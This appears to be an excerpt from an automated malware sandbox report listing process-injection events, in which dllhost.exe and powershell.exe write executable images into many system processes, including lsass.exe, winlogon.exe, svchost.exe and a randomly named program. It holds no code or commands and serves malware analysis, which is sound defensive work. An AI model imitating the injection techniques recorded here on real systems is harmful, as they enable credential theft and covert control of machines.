Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 23BCC520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 23BCC550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 1D865090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 199015D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 1CB2E610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 1CB2E640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 188D6710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 29F37400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 2580 base: 32F0000 value: 4D
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 2580 base: 32F0000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 5968
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 6808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 2844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: 5968 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 2F00000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 947DB66010
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B3C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17184260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
